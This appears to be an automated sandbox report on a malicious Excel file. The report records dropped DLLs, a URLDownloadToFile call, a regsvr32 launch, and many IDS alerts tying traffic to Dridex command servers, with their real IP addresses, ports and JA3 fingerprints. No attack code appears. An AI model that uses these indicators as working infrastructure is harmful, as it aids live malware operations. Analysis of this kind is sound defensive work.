Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE

File opened: C:\Windows\WinSxS\amd64_microsoft.vc90.crt_1fc8b3b9a1e18e3b_9.0.30729.4940_none_08e4299fa83d7e3c\MSVCR90.dll

Jump to behavior

Uses secure TLS version for HTTPS connections

Source: unknown	HTTPS traffic detected: 64.37.52.172:443 -> 192.168.2.22:49165 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 103.83.81.27:443 -> 192.168.2.22:49169 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 198.136.54.91:443 -> 192.168.2.22:49184 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 192.185.224.50:443 -> 192.168.2.22:49191 version: TLS 1.2

Software Vulnerabilities:

Document exploit detected (creates forbidden files)

Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE	File created: C:\Users\user\AppData\Local\Temp\kxwni.dll	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE	File created: C:\Users\user\AppData\Local\Temp\nnmumzom.dll	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE	File created: C:\Users\user\AppData\Local\Temp\sxzjqf.dll	Jump to behavior

Document exploit detected (drops PE files)

Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE

File created: l3v7tq4[1].rar.0.dr

Jump to dropped file

Document exploit detected (UrlDownloadToFile)

Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE

Section loaded: \KnownDlls\api-ms-win-downlevel-shlwapi-l2-1-0.dll origin: URLDownloadToFileA

Jump to behavior

Document exploit detected (process start blacklist hit)

Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE

Process created: C:\Windows\System32\regsvr32.exe

Jump to behavior

Potential document exploit detected (performs DNS queries)

Source: global traffic

DNS query: name: qsf.surfescape.net

Potential document exploit detected (performs HTTP gets)

Source: global traffic

TCP traffic: 192.168.2.22:49165 -> 64.37.52.172:443

Potential document exploit detected (unknown TCP traffic)

Source: global traffic

TCP traffic: 192.168.2.22:49165 -> 64.37.52.172:443

Networking:

Snort IDS alert for network traffic (e.g. based on Emerging Threat rules)

Source: Traffic	Snort IDS: 2023476 ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex) 194.225.58.214:443 -> 192.168.2.22:49170
Source: Traffic	Snort IDS: 2023476 ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex) 211.110.44.63:5353 -> 192.168.2.22:49171
Source: Traffic	Snort IDS: 2023476 ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex) 198.57.200.100:3786 -> 192.168.2.22:49173
Source: Traffic	Snort IDS: 2022535 ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex) 198.57.200.100:3786 -> 192.168.2.22:49173
Source: Traffic	Snort IDS: 2023476 ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex) 194.225.58.214:443 -> 192.168.2.22:49174
Source: Traffic	Snort IDS: 2023476 ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex) 211.110.44.63:5353 -> 192.168.2.22:49175
Source: Traffic	Snort IDS: 2023476 ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex) 194.225.58.214:443 -> 192.168.2.22:49176
Source: Traffic	Snort IDS: 2023476 ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex) 211.110.44.63:5353 -> 192.168.2.22:49178
Source: Traffic	Snort IDS: 2023476 ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex) 198.57.200.100:3786 -> 192.168.2.22:49179
Source: Traffic	Snort IDS: 2022535 ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex) 198.57.200.100:3786 -> 192.168.2.22:49179
Source: Traffic	Snort IDS: 2023476 ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex) 194.225.58.214:443 -> 192.168.2.22:49181
Source: Traffic	Snort IDS: 2023476 ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex) 211.110.44.63:5353 -> 192.168.2.22:49182
Source: Traffic	Snort IDS: 2023476 ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex) 198.57.200.100:3786 -> 192.168.2.22:49183
Source: Traffic	Snort IDS: 2022535 ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex) 198.57.200.100:3786 -> 192.168.2.22:49183
Source: Traffic	Snort IDS: 2023476 ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex) 194.225.58.214:443 -> 192.168.2.22:49185
Source: Traffic	Snort IDS: 2023476 ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex) 211.110.44.63:5353 -> 192.168.2.22:49187
Source: Traffic	Snort IDS: 2023476 ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex) 198.57.200.100:3786 -> 192.168.2.22:49188
Source: Traffic	Snort IDS: 2022535 ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex) 198.57.200.100:3786 -> 192.168.2.22:49188
Source: Traffic	Snort IDS: 2023476 ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex) 194.225.58.214:443 -> 192.168.2.22:49190
Source: Traffic	Snort IDS: 2023476 ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex) 198.57.200.100:3786 -> 192.168.2.22:49193
Source: Traffic	Snort IDS: 2022535 ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex) 198.57.200.100:3786 -> 192.168.2.22:49193
Source: Traffic	Snort IDS: 2023476 ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex) 211.110.44.63:5353 -> 192.168.2.22:49192
Source: Traffic	Snort IDS: 2023476 ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex) 194.225.58.214:443 -> 192.168.2.22:49194
Source: Traffic	Snort IDS: 2023476 ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex) 211.110.44.63:5353 -> 192.168.2.22:49196
Source: Traffic	Snort IDS: 2023476 ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex) 198.57.200.100:3786 -> 192.168.2.22:49197
Source: Traffic	Snort IDS: 2022535 ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex) 198.57.200.100:3786 -> 192.168.2.22:49197
Source: Traffic	Snort IDS: 2023476 ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex) 194.225.58.214:443 -> 192.168.2.22:49198
Source: Traffic	Snort IDS: 2023476 ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex) 211.110.44.63:5353 -> 192.168.2.22:49200
Source: Traffic	Snort IDS: 2023476 ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex) 198.57.200.100:3786 -> 192.168.2.22:49201
Source: Traffic	Snort IDS: 2022535 ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex) 198.57.200.100:3786 -> 192.168.2.22:49201
Source: Traffic	Snort IDS: 2023476 ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex) 194.225.58.214:443 -> 192.168.2.22:49202
Source: Traffic	Snort IDS: 2023476 ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex) 211.110.44.63:5353 -> 192.168.2.22:49204
Source: Traffic	Snort IDS: 2023476 ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex) 198.57.200.100:3786 -> 192.168.2.22:49205
Source: Traffic	Snort IDS: 2022535 ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex) 198.57.200.100:3786 -> 192.168.2.22:49205
Source: Traffic	Snort IDS: 2023476 ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex) 194.225.58.214:443 -> 192.168.2.22:49206
Source: Traffic	Snort IDS: 2023476 ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex) 211.110.44.63:5353 -> 192.168.2.22:49207
Source: Traffic	Snort IDS: 2023476 ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex) 198.57.200.100:3786 -> 192.168.2.22:49209
Source: Traffic	Snort IDS: 2022535 ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex) 198.57.200.100:3786 -> 192.168.2.22:49209
Source: Traffic	Snort IDS: 2023476 ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex) 194.225.58.214:443 -> 192.168.2.22:49211
Source: Traffic	Snort IDS: 2023476 ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex) 198.57.200.100:3786 -> 192.168.2.22:49212
Source: Traffic	Snort IDS: 2022535 ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex) 198.57.200.100:3786 -> 192.168.2.22:49212
Source: Traffic	Snort IDS: 2023476 ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex) 211.110.44.63:5353 -> 192.168.2.22:49213
Source: Traffic	Snort IDS: 2023476 ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex) 194.225.58.214:443 -> 192.168.2.22:49214
Source: Traffic	Snort IDS: 2023476 ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex) 211.110.44.63:5353 -> 192.168.2.22:49215
Source: Traffic	Snort IDS: 2023476 ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex) 198.57.200.100:3786 -> 192.168.2.22:49218
Source: Traffic	Snort IDS: 2022535 ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex) 198.57.200.100:3786 -> 192.168.2.22:49218
Source: Traffic	Snort IDS: 2023476 ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex) 198.57.200.100:3786 -> 192.168.2.22:49219
Source: Traffic	Snort IDS: 2022535 ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex) 198.57.200.100:3786 -> 192.168.2.22:49219
Source: Traffic	Snort IDS: 2023476 ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex) 194.225.58.214:443 -> 192.168.2.22:49220
Source: Traffic	Snort IDS: 2023476 ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex) 194.225.58.214:443 -> 192.168.2.22:49222
Source: Traffic	Snort IDS: 2023476 ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex) 211.110.44.63:5353 -> 192.168.2.22:49221
Source: Traffic	Snort IDS: 2023476 ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex) 211.110.44.63:5353 -> 192.168.2.22:49223
Source: Traffic	Snort IDS: 2023476 ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex) 198.57.200.100:3786 -> 192.168.2.22:49226
Source: Traffic	Snort IDS: 2022535 ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex) 198.57.200.100:3786 -> 192.168.2.22:49226
Source: Traffic	Snort IDS: 2023476 ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex) 198.57.200.100:3786 -> 192.168.2.22:49227
Source: Traffic	Snort IDS: 2022535 ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex) 198.57.200.100:3786 -> 192.168.2.22:49227
Source: Traffic	Snort IDS: 2023476 ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex) 194.225.58.214:443 -> 192.168.2.22:49228
Source: Traffic	Snort IDS: 2023476 ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex) 194.225.58.214:443 -> 192.168.2.22:49229
Source: Traffic	Snort IDS: 2023476 ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex) 211.110.44.63:5353 -> 192.168.2.22:49230
Source: Traffic	Snort IDS: 2023476 ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex) 211.110.44.63:5353 -> 192.168.2.22:49231
Source: Traffic	Snort IDS: 2023476 ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex) 198.57.200.100:3786 -> 192.168.2.22:49234
Source: Traffic	Snort IDS: 2022535 ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex) 198.57.200.100:3786 -> 192.168.2.22:49234
Source: Traffic	Snort IDS: 2023476 ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex) 194.225.58.214:443 -> 192.168.2.22:49235
Source: Traffic	Snort IDS: 2023476 ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex) 194.225.58.214:443 -> 192.168.2.22:49237
Source: Traffic	Snort IDS: 2023476 ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex) 198.57.200.100:3786 -> 192.168.2.22:49236
Source: Traffic	Snort IDS: 2022535 ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex) 198.57.200.100:3786 -> 192.168.2.22:49236
Source: Traffic	Snort IDS: 2023476 ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex) 211.110.44.63:5353 -> 192.168.2.22:49238
Source: Traffic	Snort IDS: 2023476 ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex) 194.225.58.214:443 -> 192.168.2.22:49239
Source: Traffic	Snort IDS: 2023476 ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex) 211.110.44.63:5353 -> 192.168.2.22:49240
Source: Traffic	Snort IDS: 2023476 ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex) 211.110.44.63:5353 -> 192.168.2.22:49241
Source: Traffic	Snort IDS: 2023476 ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex) 198.57.200.100:3786 -> 192.168.2.22:49244
Source: Traffic	Snort IDS: 2022535 ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex) 198.57.200.100:3786 -> 192.168.2.22:49244
Source: Traffic	Snort IDS: 2023476 ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex) 198.57.200.100:3786 -> 192.168.2.22:49246
Source: Traffic	Snort IDS: 2022535 ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex) 198.57.200.100:3786 -> 192.168.2.22:49246
Source: Traffic	Snort IDS: 2023476 ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex) 194.225.58.214:443 -> 192.168.2.22:49247
Source: Traffic	Snort IDS: 2023476 ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex) 198.57.200.100:3786 -> 192.168.2.22:49248
Source: Traffic	Snort IDS: 2022535 ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex) 198.57.200.100:3786 -> 192.168.2.22:49248
Source: Traffic	Snort IDS: 2023476 ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex) 194.225.58.214:443 -> 192.168.2.22:49250
Source: Traffic	Snort IDS: 2023476 ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex) 211.110.44.63:5353 -> 192.168.2.22:49249
Source: Traffic	Snort IDS: 2023476 ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex) 194.225.58.214:443 -> 192.168.2.22:49251
Source: Traffic	Snort IDS: 2023476 ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex) 211.110.44.63:5353 -> 192.168.2.22:49252
Source: Traffic	Snort IDS: 2023476 ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex) 211.110.44.63:5353 -> 192.168.2.22:49253
Source: Traffic	Snort IDS: 2023476 ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex) 198.57.200.100:3786 -> 192.168.2.22:49255
Source: Traffic	Snort IDS: 2022535 ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex) 198.57.200.100:3786 -> 192.168.2.22:49255
Source: Traffic	Snort IDS: 2023476 ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex) 194.225.58.214:443 -> 192.168.2.22:49259
Source: Traffic	Snort IDS: 2023476 ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex) 198.57.200.100:3786 -> 192.168.2.22:49258
Source: Traffic	Snort IDS: 2022535 ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex) 198.57.200.100:3786 -> 192.168.2.22:49258
Source: Traffic	Snort IDS: 2023476 ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex) 198.57.200.100:3786 -> 192.168.2.22:49260
Source: Traffic	Snort IDS: 2022535 ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex) 198.57.200.100:3786 -> 192.168.2.22:49260
Source: Traffic	Snort IDS: 2023476 ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex) 198.57.200.100:3786 -> 192.168.2.22:49261
Source: Traffic	Snort IDS: 2022535 ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex) 198.57.200.100:3786 -> 192.168.2.22:49261
Source: Traffic	Snort IDS: 2023476 ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex) 194.225.58.214:443 -> 192.168.2.22:49263
Source: Traffic	Snort IDS: 2023476 ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex) 211.110.44.63:5353 -> 192.168.2.22:49262
Source: Traffic	Snort IDS: 2023476 ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex) 194.225.58.214:443 -> 192.168.2.22:49264
Source: Traffic	Snort IDS: 2023476 ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex) 194.225.58.214:443 -> 192.168.2.22:49265
Source: Traffic	Snort IDS: 2023476 ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex) 211.110.44.63:5353 -> 192.168.2.22:49266
Source: Traffic	Snort IDS: 2023476 ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex) 211.110.44.63:5353 -> 192.168.2.22:49268
Source: Traffic	Snort IDS: 2023476 ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex) 211.110.44.63:5353 -> 192.168.2.22:49269
Source: Traffic	Snort IDS: 2023476 ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex) 194.225.58.214:443 -> 192.168.2.22:49270
Source: Traffic	Snort IDS: 2023476 ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex) 198.57.200.100:3786 -> 192.168.2.22:49271
Source: Traffic	Snort IDS: 2022535 ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex) 198.57.200.100:3786 -> 192.168.2.22:49271
Source: Traffic	Snort IDS: 2023476 ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex) 211.110.44.63:5353 -> 192.168.2.22:49273
Source: Traffic	Snort IDS: 2023476 ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex) 194.225.58.214:443 -> 192.168.2.22:49275
Source: Traffic	Snort IDS: 2023476 ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex) 198.57.200.100:3786 -> 192.168.2.22:49276
Source: Traffic	Snort IDS: 2022535 ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex) 198.57.200.100:3786 -> 192.168.2.22:49276
Source: Traffic	Snort IDS: 2023476 ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex) 198.57.200.100:3786 -> 192.168.2.22:49278
Source: Traffic	Snort IDS: 2022535 ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex) 198.57.200.100:3786 -> 192.168.2.22:49278
Source: Traffic	Snort IDS: 2023476 ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex) 211.110.44.63:5353 -> 192.168.2.22:49277
Source: Traffic	Snort IDS: 2023476 ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex) 211.110.44.63:5353 -> 192.168.2.22:49279
Source: Traffic	Snort IDS: 2023476 ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex) 194.225.58.214:443 -> 192.168.2.22:49281
Source: Traffic	Snort IDS: 2023476 ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex) 194.225.58.214:443 -> 192.168.2.22:49282
Source: Traffic	Snort IDS: 2023476 ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex) 198.57.200.100:3786 -> 192.168.2.22:49283
Source: Traffic	Snort IDS: 2022535 ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex) 198.57.200.100:3786 -> 192.168.2.22:49283
Source: Traffic	Snort IDS: 2023476 ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex) 211.110.44.63:5353 -> 192.168.2.22:49284
Source: Traffic	Snort IDS: 2023476 ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex) 211.110.44.63:5353 -> 192.168.2.22:49286
Source: Traffic	Snort IDS: 2023476 ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex) 194.225.58.214:443 -> 192.168.2.22:49288
Source: Traffic	Snort IDS: 2023476 ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex) 198.57.200.100:3786 -> 192.168.2.22:49289
Source: Traffic	Snort IDS: 2022535 ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex) 198.57.200.100:3786 -> 192.168.2.22:49289
Source: Traffic	Snort IDS: 2023476 ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex) 211.110.44.63:5353 -> 192.168.2.22:49290
Source: Traffic	Snort IDS: 2023476 ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex) 198.57.200.100:3786 -> 192.168.2.22:49292
Source: Traffic	Snort IDS: 2022535 ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex) 198.57.200.100:3786 -> 192.168.2.22:49292
Source: Traffic	Snort IDS: 2023476 ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex) 194.225.58.214:443 -> 192.168.2.22:49294
Source: Traffic	Snort IDS: 2023476 ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex) 198.57.200.100:3786 -> 192.168.2.22:49295
Source: Traffic	Snort IDS: 2022535 ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex) 198.57.200.100:3786 -> 192.168.2.22:49295
Source: Traffic	Snort IDS: 2023476 ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex) 198.57.200.100:3786 -> 192.168.2.22:49297
Source: Traffic	Snort IDS: 2022535 ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex) 198.57.200.100:3786 -> 192.168.2.22:49297
Source: Traffic	Snort IDS: 2023476 ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex) 194.225.58.214:443 -> 192.168.2.22:49298
Source: Traffic	Snort IDS: 2023476 ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex) 211.110.44.63:5353 -> 192.168.2.22:49296
Source: Traffic	Snort IDS: 2023476 ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex) 194.225.58.214:443 -> 192.168.2.22:49300
Source: Traffic	Snort IDS: 2023476 ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex) 194.225.58.214:443 -> 192.168.2.22:49302
Source: Traffic	Snort IDS: 2023476 ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex) 211.110.44.63:5353 -> 192.168.2.22:49301
Source: Traffic	Snort IDS: 2023476 ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex) 198.57.200.100:3786 -> 192.168.2.22:49303
Source: Traffic	Snort IDS: 2022535 ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex) 198.57.200.100:3786 -> 192.168.2.22:49303
Source: Traffic	Snort IDS: 2023476 ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex) 211.110.44.63:5353 -> 192.168.2.22:49304
Source: Traffic	Snort IDS: 2023476 ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex) 211.110.44.63:5353 -> 192.168.2.22:49306
Source: Traffic	Snort IDS: 2023476 ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex) 194.225.58.214:443 -> 192.168.2.22:49307
Source: Traffic	Snort IDS: 2023476 ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex) 198.57.200.100:3786 -> 192.168.2.22:49308
Source: Traffic	Snort IDS: 2022535 ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex) 198.57.200.100:3786 -> 192.168.2.22:49308
Source: Traffic	Snort IDS: 2023476 ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex) 211.110.44.63:5353 -> 192.168.2.22:49311
Source: Traffic	Snort IDS: 2023476 ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex) 198.57.200.100:3786 -> 192.168.2.22:49313
Source: Traffic	Snort IDS: 2022535 ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex) 198.57.200.100:3786 -> 192.168.2.22:49313
Source: Traffic	Snort IDS: 2023476 ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex) 194.225.58.214:443 -> 192.168.2.22:49314
Source: Traffic	Snort IDS: 2023476 ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex) 198.57.200.100:3786 -> 192.168.2.22:49315
Source: Traffic	Snort IDS: 2022535 ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex) 198.57.200.100:3786 -> 192.168.2.22:49315
Source: Traffic	Snort IDS: 2023476 ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex) 198.57.200.100:3786 -> 192.168.2.22:49316
Source: Traffic	Snort IDS: 2022535 ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex) 198.57.200.100:3786 -> 192.168.2.22:49316
Source: Traffic	Snort IDS: 2023476 ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex) 194.225.58.214:443 -> 192.168.2.22:49318
Source: Traffic	Snort IDS: 2023476 ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex) 211.110.44.63:5353 -> 192.168.2.22:49317
Source: Traffic	Snort IDS: 2023476 ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex) 194.225.58.214:443 -> 192.168.2.22:49319
Source: Traffic	Snort IDS: 2023476 ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex) 194.225.58.214:443 -> 192.168.2.22:49320
Source: Traffic	Snort IDS: 2023476 ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex) 211.110.44.63:5353 -> 192.168.2.22:49321
Source: Traffic	Snort IDS: 2023476 ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex) 211.110.44.63:5353 -> 192.168.2.22:49322
Source: Traffic	Snort IDS: 2023476 ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex) 198.57.200.100:3786 -> 192.168.2.22:49326
Source: Traffic	Snort IDS: 2022535 ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex) 198.57.200.100:3786 -> 192.168.2.22:49326
Source: Traffic	Snort IDS: 2023476 ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex) 211.110.44.63:5353 -> 192.168.2.22:49325

Detected TCP or UDP traffic on non-standard ports

Source: global traffic	TCP traffic: 192.168.2.22:49172 -> 69.164.207.140:3388
Source: global traffic	TCP traffic: 192.168.2.22:49173 -> 198.57.200.100:3786

Downloads executable code via HTTP

Source: global traffic

IP address seen in connection with other malware

Source: Joe Sandbox View	IP Address: 69.164.207.140 69.164.207.140
Source: Joe Sandbox View	IP Address: 211.110.44.63 211.110.44.63

Internet Provider seen in connection with other malware

Source: Joe Sandbox View

ASN Name: LINODE-APLinodeLLCUS LINODE-APLinodeLLCUS

JA3 SSL client fingerprint seen in connection with other malware

Source: Joe Sandbox View	JA3 fingerprint: 7dcce5b76c8b17472d024758970a406b
Source: Joe Sandbox View	JA3 fingerprint: eb88d0b3e1961a0562f006e5ce2a0b87

Uses a known web browser user agent for HTTP communication

Source: global traffic

Uses insecure TLS / SSL version for HTTPS connection

